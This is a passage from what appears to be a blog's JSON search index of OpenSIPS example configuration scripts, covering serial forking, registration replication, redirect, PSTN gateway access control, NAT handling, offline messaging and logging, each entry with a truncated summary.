Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_method(\u0026#34;REGISTER\u0026#34;)) { sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.168.2.16:5064\u0026#34;); # if transaction broken, try an alternative route t_on_failure(\u0026#34;1\u0026#34;); # if a provisional came, stop alternating t_on_reply(\u0026#34;1\u0026#34;); }; t_relay(); } failure_route[1] { log(1, \u0026#34;trying at alternate destination\\n\u0026#34;); seturi(\u0026#34;sip:yyy@192.168.2.16:5064\u0026#34;); t_relay(); } onreply_route[1] { log(1, \u0026#34;reply came in\\n\u0026#34;); if ($rs=~\u0026#34;18[0-9]\u0026#34;) { log(1, \u0026#34;provisional -- resetting negative failure\\n\u0026#34;); t_on_failure(\u0026#34;0\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/serial-183/","summary":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # skip register for testing purposes if (is_method(\u0026#34;REGISTER\u0026#34;)) { 
sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); exit; }; if (is_method(\u0026#34;INVITE\u0026#34;)) { seturi(\u0026#34;sip:xxx@192.","title":"serial_183"},{"content":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { # verify credentials if (!www_authorize(\u0026#34;foo.bar\u0026#34;, \u0026#34;subscriber\u0026#34;)) { www_challenge(\u0026#34;foo.bar\u0026#34;, 
\u0026#34;0\u0026#34;); exit; }; # if ok, update contacts and ... save(\u0026#34;location\u0026#34;); # ... if this REGISTER is not a replica from our # peer server, replicate to the peer server $var(backup_ip) = \u0026#34;backup.foo.bar\u0026#34; {ip.resolve}; if (!$si==$var(backup_ip)) { t_replicate(\u0026#34;sip:backup.foo.bar:5060\u0026#34;); }; exit; }; # do whatever else appropriate for your domain log(\u0026#34;non-REGISTER\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/replicate/","summary":"# # demo script showing how to set-up usrloc replication # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=yes # (cmd line: -E) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # digest generation secret; use the same in backup server; # also, make sure that the backup server has sync\u0026#39;ed time modparam(\u0026#34;auth\u0026#34;, \u0026#34;secret\u0026#34;, \u0026#34;alsdkhglaksdhfkloiwr\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwars==0, or excessively long requests if (!","title":"replicate"},{"content":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # 
------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.net:9\u0026#34;); # redirect now sl_send_reply(\u0026#34;300\u0026#34;, \u0026#34;Redirect\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/redirect/","summary":"# # $Id$ # # this example shows use of ser as stateless redirect server # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if ($rm==\u0026#34;REGISTER\u0026#34;) { log(\u0026#34;REGISTER\u0026#34;); sl_send_reply(\u0026#34;200\u0026#34;, \u0026#34;ok\u0026#34;); return; }; # rewrite current URI, which is always part of destination ser rewriteuri(\u0026#34;sip:parallel@siphub.net:9\u0026#34;); # append one more URI to the destination ser append_branch(\u0026#34;sip:redirect@siphub.","title":"redirect"},{"content":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule 
\u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; /* ********* RR ********************************** */ /* grant Route routing if route headers present */ if (loose_route()) { t_relay(); exit; }; /* record-route INVITEs -- all subsequent requests must visit us */ if ($rm==\u0026#34;INVITE\u0026#34;) { record_route(); }; # now check if it really is a PSTN destination which should be handled # by our gateway; if not, and the request is an invitation, drop it -- # we cannot terminate it in PSTN; relay non-INVITE requests -- it may # be for example BYEs sent by gateway to call originator if (!$ru=~\u0026#34;sip:\\+?[0-9]+@.*\u0026#34;) { if ($rm==\u0026#34;INVITE\u0026#34;) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Call cannot be served here\u0026#34;); } 
else { forward(); }; exit; }; # account completed transactions via syslog setflag(1); # free call destinations ... no authentication needed if ( is_user_in(\u0026#34;Request-URI\u0026#34;, \u0026#34;free-pstn\u0026#34;) /* free destinations */ || $ru=~\u0026#34;sip:[79][0-9][0-9][0-9]@.*\u0026#34; /* local PBX */ || $ru=~\u0026#34;sip:98[0-9][0-9][0-9][0-9]\u0026#34;) { log(\u0026#34;free call\u0026#34;); } else if ($si==192.168.0.10) { # our gateway doesn\u0026#39;t support digest authentication; # verify that a request is coming from it by source # address log(\u0026#34;gateway-originated request\u0026#34;); } else { # in all other cases, we need to check the request against # access control lists; first of all, verify request # originator\u0026#39;s identity if (!proxy_authorize(\t\u0026#34;gateway\u0026#34; /* realm */, \u0026#34;subscriber\u0026#34; /* table name */)) { proxy_challenge( \u0026#34;gateway\u0026#34; /* realm */, \u0026#34;0\u0026#34; /* no qop */ ); exit; }; # authorize only for INVITEs -- RR/Contact may result in weird # things showing up in d-uri that would break our logic; our # major concern is INVITE which causes PSTN costs if ($rm==\u0026#34;INVITE\u0026#34;) { # does the authenticated user have a permission for local # calls (destinations beginning with a single zero)? # (i.e., is he in the \u0026#34;local\u0026#34; group?) 
if ($ru=~\u0026#34;sip:0[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;local\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;No permission for local calls\u0026#34;); exit; }; # the same for long-distance (destinations begin with two zeros\u0026#34;) } else if ($ru=~\u0026#34;sip:00[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;ld\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34; no permission for LD \u0026#34;); exit; }; # the same for international calls (three zeros) } else if ($ru=~\u0026#34;sip:000[1-9][0-9]+@.*\u0026#34;) { if (!is_user_in(\u0026#34;credentials\u0026#34;, \u0026#34;int\u0026#34;)) { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;International permissions needed\u0026#34;); exit; }; # everything else (e.g., interplanetary calls) is denied } else { sl_send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; }; }; # INVITE to authorized PSTN }; # authorized PSTN # if you have passed through all the checks, let your call go to GW! 
rewritehostport(\u0026#34;192.168.0.10:5060\u0026#34;); # forward the request now if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/pstn/","summary":"# # $Id$ # # example: ser configured as PSTN gateway guard; PSTN gateway is located # at 192.168.0.10 # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;auth.so\u0026#34; loadmodule \u0026#34;auth_db.so\u0026#34; loadmodule \u0026#34;group.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; # ----------------- setting module-specific parameters --------------- modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # that is the flag for which we will account -- don\u0026#39;t forget to # set the same one :-) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"pstn"},{"content":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. 
# # If you have an endpoint in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy. If you don\u0026#39;t want to enforce # RTP proxy for some destinations then simply use t_relay() instead of # route(1) # # Sections marked with !! Nathelper contain modifications for nathelper # # NOTE !! This config is EXPERIMENTAL ! # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # !!
Nathelper loadmodule \u0026#34;nathelper.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which is true in this config), # uncomment also the following parameter #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # !! Nathelper modparam(\u0026#34;usrloc\u0026#34;,\u0026#34;nat_bflag\u0026#34;,6) modparam(\u0026#34;nathelper\u0026#34;,\u0026#34;sipping_bflag\u0026#34;,8) modparam(\u0026#34;nathelper\u0026#34;, \u0026#34;ping_nated_only\u0026#34;, 1) # Ping only clients behind NAT # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # !!
Nathelper # Special handling for NATed clients; first, NAT test is # executed: it looks for via!=received and RFC1918 addresses # in Contact (may fail if line-folding is used); also, # the received test, if completed, should check all # vias for presence of received if (nat_uac_test(\u0026#34;3\u0026#34;)) { # Allow RR-ed requests, as these may indicate that # a NAT-enabled proxy takes care of it; unless it is # a REGISTER if (is_method(\u0026#34;REGISTER\u0026#34;) || !is_present_hf(\u0026#34;Record-Route\u0026#34;)) { log(\u0026#34;LOG:Someone trying to register from private IP, rewriting\\n\u0026#34;); # This will work only for user agents that support symmetric # communication. We tested quite many of them and majority is # smart enough to be symmetric. In some phones it takes a # configuration option. With Cisco 7960, it is called # NAT_Enable=Yes, with kphone it is called \u0026#34;symmetric media\u0026#34; and # \u0026#34;symmetric signalling\u0026#34;. # Rewrite contact with source IP of signalling fix_nated_contact(); if ( is_method(\u0026#34;INVITE\u0026#34;) ) { fix_nated_sdp(\u0026#34;1\u0026#34;); # Add direction=active to SDP }; force_rport(); # Add rport parameter to topmost Via setbflag(6); # Mark as NATed # if you want sip nat pinging # setbflag(8); }; }; # subsequent messages within a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); route(1); exit; }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(1); exit; }; # if the request is for other domain use UsrLoc # (in case,
it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;siphub.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;siphub.org\u0026#34;, \u0026#34;0\u0026#34;); #\treturn; #}; save(\u0026#34;location\u0026#34;); exit; }; lookup(\u0026#34;aliases\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); exit; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); route(1); } route[1] { # !! Nathelper if ($ru=~\u0026#34;[@:](192\\.168\\.|10\\.|172\\.(1[6-9]|2[0-9]|3[0-1])\\.)\u0026#34; \u0026amp;\u0026amp; !search(\u0026#34;^Route:\u0026#34;)){ sl_send_reply(\u0026#34;479\u0026#34;, \u0026#34;We don\u0026#39;t forward to private IP addresses\u0026#34;); exit; }; # if client or server know to be behind a NAT, enable relay if (isbflagset(6)) { rtpproxy_offer(); }; # NAT processing of replies; apply to all transactions (for example, # re-INVITEs from public to private UA are hard to identify as # NATed at the moment of request processing); look at replies t_on_reply(\u0026#34;1\u0026#34;); # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; } # !! Nathelper onreply_route[1] { # NATed transaction ? if (isbflagset(6) \u0026amp;\u0026amp; $rs =~ \u0026#34;(183)|2[0-9][0-9]\u0026#34;) { fix_nated_contact(); rtpproxy_answer(); # otherwise, is it a transaction behind a NAT and we did not # know at time of request processing ? 
(RFC1918 contacts) } else if (nat_uac_test(\u0026#34;1\u0026#34;)) { fix_nated_contact(); }; } ","permalink":"https://wdd.js.org/opensips/ch8/nathelper/","summary":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoint in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy.","title":"nathelper"},{"content":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !mf_process_maxfwd_header(\u0026#34;10\u0026#34;) ) {
sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if (is_myself(\u0026#34;$rd\u0026#34;)) { # for testing purposes, simply okay all REGISTERs # is_method(\u0026#34;XYZ\u0026#34;) is faster than ($rm==\u0026#34;XYZ\u0026#34;) # but requires textops module if (is_method(\u0026#34;REGISTER\u0026#34;)) { save(\u0026#34;location\u0026#34;); log(\u0026#34;REGISTER received -\u0026gt; dumping messages with MSILO\\n\u0026#34;); # MSILO - dumping user\u0026#39;s offline messages if (m_dump()) { log(\u0026#34;MSILO: offline messages dumped - if they were\\n\u0026#34;); } else { log(\u0026#34;MSILO: no offline messages dumped\\n\u0026#34;); }; exit; }; # backup r-uri for m_dump() in case of delivery failure $avp(11) = $ru; # domestic SIP destinations are handled using our USRLOC DB if(!lookup(\u0026#34;location\u0026#34;)) { if (! t_newtran()) { sl_reply_error(); exit; }; # we do not care about anything else but MESSAGEs if (!is_method(\u0026#34;MESSAGE\u0026#34;)) { if (!t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not found\u0026#34;)) { sl_reply_error(); }; exit; }; log(\u0026#34;MESSAGE received -\u0026gt; storing using MSILO\\n\u0026#34;); # MSILO - storing as offline message if (m_store(\u0026#34;$ru\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); if (!t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;)) { sl_reply_error(); }; }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); if (!t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;)) { sl_reply_error(); }; }; exit; }; # if the downstream UA does not support MESSAGE requests # go to failure_route[1] t_on_failure(\u0026#34;1\u0026#34;); t_relay(); exit; }; # forward anything else t_relay(); } failure_route[1] { # forwarding failed -- check if the request was a MESSAGE if (!is_method(\u0026#34;MESSAGE\u0026#34;)) exit; log(1,\u0026#34;MSILO: the downstream UA does not support MESSAGE requests ...\\n\u0026#34;); # we
have changed the R-URI with the contact address -- ignore it now if (m_store(\u0026#34;$avp(11)\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;); }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/msilo/","summary":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !","title":"msilo"},{"content":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing 
purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/logging/","summary":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","title":"logging"},{"content":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","permalink":"https://wdd.js.org/opensips/ch8/httpd/","summary":"# # $Id$ # # this example shows
use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","title":"httpd"},{"content":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # mysql.so must be loaded ! 
